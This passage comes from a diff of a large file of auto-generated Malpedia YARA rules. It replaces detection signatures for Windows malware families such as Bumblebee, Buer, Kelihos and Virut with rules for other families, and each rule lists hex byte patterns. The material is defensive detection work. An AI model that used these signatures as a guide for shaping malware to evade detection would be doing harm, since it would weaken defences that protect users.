"N/A" - logic_hash = "6f0c75693d906262c5895d882d984643cdff0e946d0c3df9bf0f7a28d5c9d704" + logic_hash = "318d1d367a3335dce76e46790f71f42f9c5ddb3e28ec2c109117f64c52aadcd2" score = 75 quality = 75 tags = "FILE" @@ -166478,32 +169335,38 @@ rule MALPEDIA_Win_Neteagle_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d4c2418 e8???????? 8d4c2418 e8???????? 8b84241c300000 89742410 3bc6 } - $sequence_1 = { 83c408 50 51 8d442428 } - $sequence_2 = { c68424240200000d 8bcc 8964242c 68???????? e8???????? } - $sequence_3 = { 6a00 6a00 57 56 6840800000 ff15???????? } - $sequence_4 = { c684241802000018 8bcc 89642424 8d542428 52 e8???????? 8d442420 } - $sequence_5 = { 8d4dec e8???????? 6800100000 8d4dec c645fc0d e8???????? 8b16 } - $sequence_6 = { 8d4c2428 c68424540c000006 e8???????? 8d542414 68???????? 8d442414 52 } - $sequence_7 = { c684241002000004 e8???????? 8d4e34 c684241002000005 e8???????? 8d4e38 c684241002000006 } - $sequence_8 = { 52 6a00 6a00 8b3d???????? ffd7 83f820 7f1b } - $sequence_9 = { 888c0414010000 40 3bc6 7ced 8d942414010000 8d4c240c 52 } + $sequence_0 = { 83c204 3bcf 72f0 8d43ff } + $sequence_1 = { 69c0b179379e c1e813 03c9 0fb73411 } + $sequence_2 = { 8b5508 69c0b179379e c1e813 33c9 66890c42 } + $sequence_3 = { 8d43ff 3bc8 7311 0fb702 } + $sequence_4 = { 8bc1 2b45fc 5f 5e } + $sequence_5 = { eb02 0008 8b45f8 83c0f4 897dfc } + $sequence_6 = { 663bc6 7506 83c102 83c202 3bcb 7307 } + $sequence_7 = { 7311 0fb702 0fb731 663bc6 7506 83c102 } + $sequence_8 = { 488bf2 41c1ed04 492bf0 41ffc5 488bd3 488bcf } + $sequence_9 = { 410fb6c0 4133b48e803c0100 4133b48680480100 418bc0 41337530 c1e808 0fb6d0 } + $sequence_10 = { 0fb6c8 410fb6c0 4133bc8e803c0100 4133bc8680480100 41337d60 418bc0 } + $sequence_11 = { 448bce 448bc7 488bd0 498bce e8???????? 448bf0 } + $sequence_12 = { 488d3d24570000 eb0e 488b03 4885c0 7402 } + $sequence_13 = { 0fb6d0 418bc6 458b949480440100 c1e810 0fb6c8 8bc5 } + $sequence_14 = { 488d0d14100100 baa00f0000 488bc5 83e51f 48c1f805 486bed58 } + $sequence_15 = { ff5348 b97f000000 ff15???????? eb1e 488b5350 498bcd ff5348 } condition: - 7 of them and filesize <262144 + 7 of them and filesize <3438592 } -rule MALPEDIA_Win_Bumblebee_Auto : FILE +rule MALPEDIA_Win_Vhd_Ransomware_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2d631f7c-7434-5c27-9009-44b4e59637b5" + id = "1b802015-a125-5833-acd7-30aed08841d8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bumblebee" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bumblebee_auto.yar#L1-L109" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vhd_ransomware" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vhd_ransomware_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "5441d9d4140ebd43dfbd5141b1d6fd9472ec1ff4702b3388ec7d6ec403a89c52" + logic_hash = "32d97d3009fbca3c4f84bd22721b2479eac7cefb08b428240c2e9ebde9b435cb" score = 75 quality = 75 tags = "FILE" @@ -166517,30 +169380,32 @@ rule MALPEDIA_Win_Bumblebee_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0fb7570e 6623d1 740d 0fbe470d b90d000000 2bc8 } - $sequence_1 = { 0f44c1 833c1800 7475 837c180400 746e 8b1418 488b05???????? } - $sequence_2 = { 0f88cc000000 4863533c 488b05???????? 4803d6 4885c0 0f84b5000000 488d4c2430 } - $sequence_3 = { 0f880c010000 488b7580 4885f6 0f84ff000000 488b05???????? 4885c0 0f84ef000000 } - $sequence_4 = { 0f8895000000 8b7b28 b8c0000000 4803fe ba64860000 66395304 8d4810 } - $sequence_5 = { 0fbec0 8d59e8 8d1c58 ffc2 } - $sequence_6 = { 0f57c0 c744242800000008 4c8d45d0 488975d8 8d4640 488975e0 } - $sequence_7 = { 0f8840010000 488b05???????? 4885c0 0f8430010000 488b542448 488d4c2438 48894c2420 } + $sequence_0 = { 8b450c 4a 3bd0 7d10 8bc8 } + $sequence_1 = { 68???????? 8d45f4 50 c745f4d8514100 e8???????? cc 8bff } + $sequence_2 = { e8???????? 8b8514e6ffff 48 83c404 4b 898514e6ffff 85c0 } + $sequence_3 = { f3ab 8b8dccfcffff 890a 85c9 7e98 8d4a04 } + $sequence_4 = { c1eb18 0fb69b98744100 c1e308 0bda 8b55cc c1ea08 0fb6d2 } + $sequence_5 = { 66895c2460 897c241c c7442420c05d4000 897c2424 897c2428 } + $sequence_6 = { 7d10 895c8204 ff02 8bde 33f6 8bcb 0bce } + $sequence_7 = { e8???????? b9c9000000 8bf0 8dbd7cf6ffff } + $sequence_8 = { 46 83fe40 7cee 8d4d9c 51 8d8d84baffff e8???????? } + $sequence_9 = { ff15???????? 32c0 e9???????? 6a00 8d8588b4ffff 50 6800200000 } condition: - 7 of them and filesize <4825088 + 7 of them and filesize <275456 } -rule MALPEDIA_Win_Backbend_Auto : FILE +rule MALPEDIA_Win_Orcarat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0c0e6fe8-d4e7-5b73-ab9b-71a979b7c8b3" + id = "2de223cb-857a-5d4b-8d3a-323fa4ad4ded" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backbend" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.backbend_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.orcarat_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "b7d55ae6e8faf28a826a20f0c2aeb325ce5a40ba350e055022c2b2475be4953d" + logic_hash = "12ec16d312c505ceab125190551fe03bd174598263e03e7c0fe4b3239bc4fe94" score = 75 quality = 75 tags = "FILE" @@ -166554,32 +169419,32 @@ rule MALPEDIA_Win_Backbend_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 80a40500ffffff00 8d8500ffffff 56 50 ff15???????? } - $sequence_1 = { 58 5f 5e c3 ff25???????? ff25???????? } - $sequence_2 = { ffd6 ff7510 ffd3 8d8500feffff } - $sequence_3 = { ff15???????? 85c0 7416 8d8500fbffff } - $sequence_4 = { 56 e8???????? 8d8500fdffff 56 50 e8???????? 68???????? } - $sequence_5 = { 90 90 90 bf???????? 57 e8???????? c70424???????? } - $sequence_6 = { 8d8500f9ffff 50 e8???????? 8d8500f9ffff 50 e8???????? 83c424 } - $sequence_7 = { ffd3 8d8500feffff 6800010000 50 ff15???????? 8d8500feffff 68???????? } - $sequence_8 = { 56 ffd3 6a00 8d8500ffffff 56 50 ff15???????? } - $sequence_9 = { 7416 8d8500fbffff 6a00 50 } + $sequence_0 = { f2ae 8d84242c110000 f7d1 50 894c2414 51 } + $sequence_1 = { 8d8c2418010000 50 51 8d842430110000 52 50 } + $sequence_2 = { 56 6a00 8d5708 6a10 } + $sequence_3 = { 53 8dbef4020000 51 50 } + $sequence_4 = { 8bf0 85f6 7451 8b442414 85c0 7421 } + $sequence_5 = { f2ae 8d442420 f7d1 50 894c2418 ff15???????? 50 } + $sequence_6 = { 303d???????? 40 00803d400023 d18a0688078a 46 018847018a46 } + $sequence_7 = { 5d 5b 81c418020000 c20400 6a01 8d142e } + $sequence_8 = { ff15???????? 85c0 0f849e010000 8b0f 53 6a01 51 } + $sequence_9 = { 33db 837d0000 762f 8d542410 c744241000000000 52 6800080000 } condition: - 7 of them and filesize <49152 + 7 of them and filesize <114688 } -rule MALPEDIA_Win_Buer_Auto : FILE +rule MALPEDIA_Win_Kelihos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "29f2986a-0230-51bb-b9a2-7f550ca2fb77" + id = "5eeb2760-12b0-5f38-935d-d1f5e018b5d9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.buer_auto.yar#L1-L170" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kelihos_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "2390d8b9be10e4a78955cb4e4f9dfe589bef2af5ea30193017caa2f367cbde8d" + logic_hash = "0a57f5287680233f80bcd1391dc843be1b51717107a9ac1743ac21e2bb163525" score = 75 quality = 75 tags = "FILE" @@ -166593,40 +169458,34 @@ rule MALPEDIA_Win_Buer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4014 8b00 8b4010 8945fc 61 8b45fc } - $sequence_1 = { 7507 e8???????? eb05 e8???????? 46 83fe20 7cd1 } - $sequence_2 = { 60 64a130000000 8b400c 8b4014 8b00 8b4010 } - $sequence_3 = { 8bc2 eb19 33c0 85d2 7e13 3bc7 } - $sequence_4 = { 8b55e8 015158 8b55d8 894148 8b45dc 03c6 89414c } - $sequence_5 = { c1e104 0bc8 6a02 5b } - $sequence_6 = { 8945f8 ff15???????? 59 59 85c0 } - $sequence_7 = { 8365fc00 53 56 57 60 64a130000000 8b400c } - $sequence_8 = { c744240402000000 8d442428 c7442408???????? c744240c01000000 } - $sequence_9 = { e8???????? 80fb03 7705 80fb02 } - $sequence_10 = { e8???????? 0f0b b92c000000 ba01000000 e8???????? 0f0b 89f9 } - $sequence_11 = { c744240401000000 c7442408???????? c744240c01000000 89442410 } - $sequence_12 = { e8???????? 56 6a00 50 e8???????? c7471c01000000 } - $sequence_13 = { c744240800000000 57 e8???????? 85c0 } - $sequence_14 = { cd29 0f0b cc 8b442404 833800 7406 ba???????? } - $sequence_15 = { e8???????? 80fb05 ba01000000 0fb6c3 } + $sequence_0 = { e8???????? 59 59 c644241701 84c0 7505 c644241700 } + $sequence_1 = { ff7508 ff75fc ff7508 50 51 ff750c 56 } + $sequence_2 = { e8???????? 6a00 6a01 8d4dc0 e8???????? 8a45ef e8???????? } + $sequence_3 = { e8???????? b001 e8???????? c20800 6a18 b8???????? e8???????? } + $sequence_4 = { e8???????? 83c40c 53 6a01 8d8ddcfdffff e8???????? 53 } + $sequence_5 = { e8???????? c645fc02 807dd800 0f84f7000000 8b06 8b4004 03c6 } + $sequence_6 = { ff75ac 8d7db8 895da8 e8???????? 83c40c 84c0 0f840b010000 } + $sequence_7 = { 8b4d0c 8b5508 6a00 6a10 50 51 52 } + $sequence_8 = { c3 6a10 b8???????? e8???????? 8b7d08 33db 53 } + $sequence_9 = { e8???????? eb02 33c0 e8???????? c20400 83c1f8 8b01 } condition: - 7 of them and filesize <3031040 + 7 of them and filesize <4702208 } -rule MALPEDIA_Win_Rikamanu_Auto : FILE +rule MALPEDIA_Win_Stration_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "08f5de79-f86c-592e-8a15-71782197d327" + id = "b1ff0234-14a0-5584-b678-4973125b246b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rikamanu" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rikamanu_auto.yar#L1-L297" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stration" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stration_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "3cf2bc6d93646710c8204bdc714006eac60fd0ca80947c5c7ae6ad8dcd343296" + logic_hash = "1e976189a59a2a64efd8d3bfcb5fabcc1cb05f5b8a248de2fec831e10609d819" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -166638,52 +169497,32 @@ rule MALPEDIA_Win_Rikamanu_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 6a14 ff15???????? a801 } - $sequence_1 = { 50 ff15???????? 8b35???????? 3d80969800 } - $sequence_2 = { 8b85e4fdffff 8d8dccfdffff 51 8d9588fdffff 52 8b95f0fdffff 53 } - $sequence_3 = { 68???????? 51 c744241c6c714000 e8???????? 33d2 6a0c 8954240a } - $sequence_4 = { 0fb6442404 8a4c240c 848821ae4000 751c 837c240800 740e 0fb70445faa64000 } - $sequence_5 = { 83c42c 5f eb26 8d4508 8db62c724000 6a00 } - $sequence_6 = { 8088????????10 8ac8 80c120 888820ad4000 eb1f 83f861 } - $sequence_7 = { 0fbe05???????? 83e802 7413 83e806 7407 bf???????? eb0c } - $sequence_8 = { 57 ff15???????? 33c0 40 ebcc } - $sequence_9 = { eba1 8b85f0fdffff 6a04 8d95ecfdffff } - $sequence_10 = { 51 68???????? 55 ffd3 bf???????? 83c9ff 33c0 } - $sequence_11 = { 6a04 55 83e103 6a01 8d44246c } - $sequence_12 = { 6a00 6a00 55 ffd7 55 } - $sequence_13 = { 56 ff15???????? 8b842470020000 03f8 57 56 ff15???????? } - $sequence_14 = { 8987709a2400 83c704 83ff28 72e6 5f } - $sequence_15 = { 83c40c 33c0 6808020000 8d95f4fdffff 52 } - $sequence_16 = { 8d34c570902400 833e00 7513 50 } - $sequence_17 = { 8d4508 8db62c724000 6a00 50 ff36 e8???????? 59 } - $sequence_18 = { 891d???????? 891d???????? ff15???????? 8d85f8feffff } - $sequence_19 = { 7373 8bc8 8bf0 c1f905 83e61f 8d3c8de0b84000 c1e603 } - $sequence_20 = { 391d???????? 0f849e000000 33c0 663bcb 0f95c0 } - $sequence_21 = { 8bec 8b450c 56 beff000000 3bc6 7518 } - $sequence_22 = { 8945e4 3d00010000 7d10 8a8c181d010000 888808972400 40 ebe6 } - $sequence_23 = { 85c0 74c9 33c9 33c0 890d???????? bf???????? 890d???????? } - $sequence_24 = { ebe3 80a0a0a6400000 40 41 41 3bc6 } - $sequence_25 = { ff15???????? ff750c e8???????? 59 3bc3 } - $sequence_26 = { 40 3acb 75f9 2bc2 8d95f8feffff } - $sequence_27 = { 8b54240c 81fa80000000 7c0e 0fba25????????01 0f820b070000 57 } - $sequence_28 = { 7457 68???????? 56 ffd5 85c0 744b 8a0e } - $sequence_29 = { c1e106 8b0485383f4100 f644080401 7405 8b0408 5d } + $sequence_0 = { 6a00 6a01 baf1000000 8bcb e8???????? 55 6a01 } + $sequence_1 = { 56 e8???????? 83c408 6a00 6a01 baf1000000 8bcd } + $sequence_2 = { e8???????? 680b040000 56 8944241c } + $sequence_3 = { c1fa05 891424 8bd1 52 e8???????? a3???????? 8b4c241c } + $sequence_4 = { ba11010000 8bce e8???????? c705????????00000000 } + $sequence_5 = { 8b15???????? 89442404 a1???????? 894c2408 8a0d???????? 89442410 8954240c } + $sequence_6 = { 33f6 85ff 893d???????? 7517 a1???????? 85c0 c605????????00 } + $sequence_7 = { 8a540404 c1e910 32d1 88540404 } + $sequence_8 = { 83f80d 7cec 8b15???????? a1???????? 8b0d???????? 891424 668b15???????? } + $sequence_9 = { eb05 bd14000000 660935???????? 8d542434 52 8d8424b4000000 } condition: - 7 of them and filesize <212992 + 7 of them and filesize <49152 } -rule MALPEDIA_Win_Slub_Auto : FILE +rule MALPEDIA_Win_Goldenspy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "195b7942-1783-5df2-bcee-76020ab94f8f" + id = "2db85832-8503-5134-9cf2-a79f16f8ed47" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slub" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.slub_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenspy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.goldenspy_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "654a15994e2d79fd54a129ac2f9c4ef4cc1a02067acc10e29921ff8e80b39dab" + logic_hash = "45ec0195c1eec86aab8f23405836b0cab0b81ad642d99b8dc40b2feb153827cd" score = 75 quality = 75 tags = "FILE" @@ -166697,32 +169536,32 @@ rule MALPEDIA_Win_Slub_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff742420 55 e8???????? 83c414 89442414 85c0 0f8512010000 } - $sequence_1 = { 807c241200 7407 c686e808000000 80beb406000000 740f ffb6b0060000 ff15???????? } - $sequence_2 = { c785bcf8ffffcce48f00 8bc8 c785c0f8ffffa0358400 c785c4f8ffff90e98500 e8???????? 8d95bcf8ffff c785bcf8ffffd8e48f00 } - $sequence_3 = { 85ff 750e 837d2c10 8d4518 0f43c2 3a08 7c13 } - $sequence_4 = { 85c0 0f8443ffffff 8b96f4000000 85d2 0f8435ffffff 8b8df0000000 6690 } - $sequence_5 = { 6800000100 6a00 6801000100 56 ff15???????? 89442414 85c0 } - $sequence_6 = { 898640010000 85c0 0f8416050000 57 e8???????? 83c404 85c0 } - $sequence_7 = { e8???????? 50 68???????? ffb50cfdffff e8???????? ffb50cfdffff } - $sequence_8 = { 8d8dc8ebffff 50 ffb5c8ebffff e8???????? 8b85c4ebffff c785dcebffff0f000000 c785d8ebffff00000000 } - $sequence_9 = { 8b86dc050000 89863c040000 8b86e0050000 898694040000 8b86e4050000 898640040000 8b86e8050000 } + $sequence_0 = { 0f87e4000000 e9???????? 83c754 837f1000 740f 68???????? 8bcf } + $sequence_1 = { 83c0fc 83f81f 0f8777060000 52 51 e8???????? 83c408 } + $sequence_2 = { 8b7608 807e0d00 74a8 8b4de8 8b5de4 } + $sequence_3 = { e8???????? 8b551c 83fa10 0f82b8fcffff 8b4d08 42 8bc1 } + $sequence_4 = { e8???????? 51 68???????? 8bcb e8???????? 8b83c8000000 } + $sequence_5 = { 8d4dd8 6a1a 68???????? c745e800000000 c745ec0f000000 c645d800 e8???????? } + $sequence_6 = { 57 68???????? e8???????? 8d47ff 83c408 83f804 } + $sequence_7 = { 75f2 8b5308 8bf2 8b7b14 0f1f00 8a02 42 } + $sequence_8 = { ff75e4 ff461c 8d4628 50 e8???????? 897e30 c7463400000000 } + $sequence_9 = { 8b85f8feffff 8b4004 c78405f8feffffb4e24600 8b85f8feffff 8b4804 8d41b0 89840df4feffff } condition: - 7 of them and filesize <1785856 + 7 of them and filesize <1081344 } -rule MALPEDIA_Win_Pillowmint_Auto : FILE +rule MALPEDIA_Win_Tor_Loader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f86758a5-97c5-5c70-a000-bfe6ecf0e5d4" + id = "a70795d3-ed07-58b1-af1f-1705de4529bb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pillowmint" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pillowmint_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tor_loader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tor_loader_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "33c9d52674ffef90debdc06a4a267346eaf178ee863fdca6106f4bbf407b2817" + logic_hash = "5d8db358e57884a4955f1fc346221e8831cd43555daaec59fcf000e4dc8835e4" score = 75 quality = 75 tags = "FILE" @@ -166736,32 +169575,32 @@ rule MALPEDIA_Win_Pillowmint_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4883ec48 488b05???????? 4833c4 4889442438 83fa01 0f8580000000 } - $sequence_1 = { 90 4c8bc0 488d1533c00000 488d4d40 e8???????? 90 4c8d051ec00000 } - $sequence_2 = { 488bd8 488b00 80781900 74e9 493bd8 741e 8b4320 } - $sequence_3 = { 4889bc2418010000 c684240801000000 41b810000000 488d155dc00200 488d8c2408010000 e8???????? } - $sequence_4 = { 49c1f803 498bc0 48c1e83f 4c03c0 0f84e0050000 498bd1 4c3bc3 } - $sequence_5 = { ff15???????? ba04010000 488d4c2430 4c8d05a2630300 395c2420 7507 4c8d05ad630300 } - $sequence_6 = { 0f95c0 48ffc0 480faf45df 48ffc8 48014368 48837de710 7209 } - $sequence_7 = { 488bd6 488d4d97 e8???????? 90 4c8d6597 48837daf10 4c0f436597 } - $sequence_8 = { ff15???????? 833d????????04 0f8cf6030000 48c785980000000f000000 4533f6 4c89b590000000 } - $sequence_9 = { 3b3d???????? 0f8392000000 488bc7 4c8bf7 49c1fe05 4c8d2d4bd30100 83e01f } + $sequence_0 = { eb29 488d7a38 e8???????? 4889df 488b4c2440 6690 e8???????? } + $sequence_1 = { eb15 4c8d8f88000000 4889f8 4c89cf e8???????? 4889c7 488b4740 } + $sequence_2 = { e8???????? 48c7400810000000 488d0da0490c00 488908 833d????????00 6690 7509 } + $sequence_3 = { eb0c 41bc00000000 41bb00000000 0f8573feffff 4c8bac2480000000 4883bc248800000004 0f855cfeffff } + $sequence_4 = { e9???????? 4c89542478 4983f901 7560 488d05a10e1900 bb01000000 4889d9 } + $sequence_5 = { e8???????? 833d????????00 750e 488b8c24800d0000 48894818 eb11 488d7818 } + $sequence_6 = { e8???????? 488d05ca2e1300 e8???????? 48c7400826000000 488d0d358f1800 488908 4889c3 } + $sequence_7 = { e8???????? 488d05dc0e3100 bb04000000 e8???????? 488b8424d0000000 e8???????? 488d050b203100 } + $sequence_8 = { eb38 488b8c24c0020000 488b11 488b4238 6690 e8???????? 83f001 } + $sequence_9 = { e8???????? 48895c2450 4889c1 488d053fe00500 4889cb e8???????? 488b5c2450 } condition: - 7 of them and filesize <4667392 + 7 of them and filesize <13050880 } -rule MALPEDIA_Win_Darkmoon_Auto : FILE +rule MALPEDIA_Win_Homefry_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c7bc3212-028b-5215-8293-c0df2749aba3" + id = "a10ca8d8-82df-517d-ba70-a87080178507" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkmoon_auto.yar#L1-L116" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.homefry_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "5987f0c1a065561468c6153b43a5b63a22d14e5454b4b93cd49fdb8fd5a12783" + logic_hash = "17959e0d47a35ecd2de71b5f2bf7c90338d7ed773cdd572cf03461913b5cbcc7" score = 75 quality = 75 tags = "FILE" @@ -166775,34 +169614,34 @@ rule MALPEDIA_Win_Darkmoon_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c745e435000000 e8???????? 83c418 85c0 } - $sequence_1 = { 7432 8d55e4 8d45e8 52 8d4dec 50 8d95e4fdffff } - $sequence_2 = { 8dbe48010000 6800f00000 8bcf e8???????? 6800f00000 8bce } - $sequence_3 = { 7314 ff7510 ff750c ff7508 } - $sequence_4 = { c645fc03 e8???????? 8d4f08 c645fc04 e8???????? } - $sequence_5 = { c645fc07 e8???????? eb02 33ff 57 c645fc01 } - $sequence_6 = { 83ec10 33c9 8bdc 33d2 8dbe48010000 } - $sequence_7 = { 8d860f040000 8945cc eb12 8d86130d0000 } - $sequence_8 = { 837df020 750e 8dbdfcfdffff c60720 } - $sequence_9 = { 50 837df400 740d 6800800000 6a00 ff75f4 ff5625 } + $sequence_0 = { e8???????? 4863d5 4803d0 488b05???????? 488917 48630a } + $sequence_1 = { 4889b5f0020000 4803cb ff15???????? 85c0 7873 488b95f0020000 } + $sequence_2 = { 740f 8bcf 4803cd 7408 } + $sequence_3 = { 8b4c2470 ff15???????? 8b4c2478 488905???????? ff15???????? 488b0d???????? } + $sequence_4 = { c705????????94000000 ff15???????? 33d2 8d4a02 ff15???????? 488bd8 } + $sequence_5 = { e8???????? 84c0 0f8418010000 48833d????????00 48899c24a0000000 4889b424a8000000 7471 } + $sequence_6 = { ff15???????? 488bcb ff15???????? 4881c420040000 } + $sequence_7 = { 488bc8 e8???????? 84c0 7426 48630d???????? 488bc3 85c9 } + $sequence_8 = { e8???????? eb05 e8???????? 84c0 7511 488d0ddd180000 } + $sequence_9 = { 483bdd 72d0 488bcf ff15???????? 33c0 488b5c2430 488b6c2438 } condition: - 7 of them and filesize <98304 + 7 of them and filesize <65536 } -rule MALPEDIA_Win_Newposthings_Auto : FILE +rule MALPEDIA_Win_Virut_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d2908836-d6a9-5323-a30e-68bb82428f91" + id = "d1cda5ac-7426-54df-b118-5de8978eea9c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.newposthings_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.virut_auto.yar#L1-L166" license_url = "N/A" - logic_hash = "aacccdc30f2a004211f7fc15df6e0bf41cf9693ce7a4e367dede73ae07376ff4" + logic_hash = "2bad431ccdf4fab7d1de984be24a8fafd07e087427bb72238bd9b56468720628" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -166814,34 +169653,40 @@ rule MALPEDIA_Win_Newposthings_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8a4601 3c30 7c04 3c39 7e0a 3c3d 7406 } - $sequence_1 = { 7423 3d00000400 7550 80c980 884c3704 8b0c9d481d0210 8a443124 } - $sequence_2 = { 83e61f 8b0485481d0210 c1e606 80643004fd 8b45f8 8b55fc 5f } - $sequence_3 = { ff7510 ff750c 56 6843120110 e8???????? 83c418 85c0 } - $sequence_4 = { 83c602 663906 74f8 6a03 56 68548e0110 e8???????? } - $sequence_5 = { 50 c644245c00 8bce e8???????? 8bf0 eb02 33f6 } - $sequence_6 = { e8???????? 50 8bcb e8???????? c745fc00000000 c745f001000000 8bc3 } - $sequence_7 = { 8b049538f34500 47 ff3418 ff15???????? 85c0 750a ff15???????? } - $sequence_8 = { 83c204 8955e0 eb86 890cb538f34500 } - $sequence_9 = { e8???????? c745fc00000000 83ec18 8bcc 896588 6aff } + $sequence_0 = { 89442418 3bc3 0f8441020000 6801040000 8d8424fc050000 53 50 } + $sequence_1 = { 33f6 8bca 83c107 3bcb 7e1b } + $sequence_2 = { 0f8402010000 803f4d 0f85f9000000 807f015a } + $sequence_3 = { 6a00 59 e30a 6a0a } + $sequence_4 = { ff74241c 6a40 ff15???????? 8bf8 33c0 3bf3 } + $sequence_5 = { 8bf0 3bf3 0f8e82000000 ff74240c 57 56 } + $sequence_6 = { 51 6800040000 8d8c2404060000 51 89442428 } + $sequence_7 = { 8bcb f3a6 61 7405 } + $sequence_8 = { 8bd4 6a00 52 ff32 } + $sequence_9 = { 33d2 8bcf 52 f6d9 52 83e103 6a40 } + $sequence_10 = { 6800030084 51 51 56 } + $sequence_11 = { 49 4e 45 54 2e44 4c } + $sequence_12 = { 53 8d442444 50 8d8424e0020000 50 ffd6 } + $sequence_13 = { eb49 395c240c 7449 33c0 395c240c 7e24 } + $sequence_14 = { 6a10 59 f3ab 50 50 } + $sequence_15 = { 66ab 8d4704 ab 32e4 ac } condition: - 7 of them and filesize <827392 + 7 of them and filesize <98304 } -rule MALPEDIA_Win_Badcall_Auto : FILE +rule MALPEDIA_Win_Moriagent_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f6c1d400-6aaf-5cd3-88ab-d61e25f09ca7" + id = "0b12c276-52ba-56f2-9890-c8bf86de4e3d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badcall" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.badcall_auto.yar#L1-L157" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moriagent" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.moriagent_auto.yar#L1-L169" license_url = "N/A" - 